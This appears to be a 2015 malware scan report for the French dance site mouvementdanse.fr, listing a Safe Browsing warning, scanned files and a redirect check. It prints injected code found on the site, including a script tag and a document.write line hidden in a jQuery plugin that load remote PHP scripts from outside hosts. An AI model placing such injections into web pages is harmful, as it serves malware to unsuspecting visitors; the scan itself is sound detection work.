Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mouvementdanse.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mouvementdanse.fr/ | 200 OK Content-Length: 21868 Content-Type: text/html | clean |
http://mavglass.com/home/mb_cms/rjdvt4hd.php?id=36793388 | 404 Not Found Content-Length: 513 Content-Type: text/html | clean |
http://mavglass.com/test404page.js | 404 Not Found Content-Length: 1699 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://apolo74.digiweb.psi.br/congresso/congresso_2004/8kmpxxb6.php?id=37361868"></script> | ||
http://mouvementdanse.fr/system/javascript/jquery.min.js | 200 OK Content-Length: 91818 Content-Type: application/javascript | clean |
http://mouvementdanse.fr/system/javascript/jquery.pikachoose.js | 200 OK Content-Length: 29858 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(g){var q={vertical:!1,rtl:!1,start:1,offset:1,size:null,scroll:3,visible:null,animation:"normal",easing:"swing",auto:0,wrap:null,initCallback:null,setupCallback:null,reloadCallback:null,itemLoadCallback:null,itemFirstInCallback:null,itemFirstOutCallback:null,itemLastInCallback:null,itemLastOutCallback:null,itemVisibleInCallback:null,itemVisibleOutCallback:null,animationStepCallback:null,buttonNextHTML:"<div></div>",buttonPrevHTML:"<div></div>",buttonNextEvent:"c document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://mouvementdanse.fr/system/javascript/jquery.pikachoose.init.js | 200 OK Content-Length: 407 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19489 Content-Type: text/javascript | clean |
http://static.ak.connect.facebook.com/connect.php/fr_FR | 200 OK Content-Length: 163173 Content-Type: application/x-javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mouvementdanse.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 23:02:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224197954; path=/; expires=Sat, 17-Jan-2015 00:06:30 GMT
Set-Cookie: 60gp=R4049158512; path=/; expires=Sat, 17-Jan-2015 00:21:00 GMT
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d4f1a271ce64afe5d996c32c2a932137%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221421449356%22%3B%7Daf8c52c09a14b3b81525635563602cf3; expires=Sat, 17-Jan-2015 01:02:36 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: mouvementdanse.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 23:02:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224197954; path=/; expires=Sat, 17-Jan-2015 00:06:30 GMT
Set-Cookie: 60gp=R4049158512; path=/; expires=Sat, 17-Jan-2015 00:21:00 GMT
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d4f1a271ce64afe5d996c32c2a932137%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221421449356%22%3B%7Daf8c52c09a14b3b81525635563602cf3; expires=Sat, 17-Jan-2015 01:02:36 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: mouvementdanse.fr
Referer: http://www.google.com/search?q=mouvementdanse.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mouvementdanse.fr
Referer: http://www.google.com/search?q=mouvementdanse.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.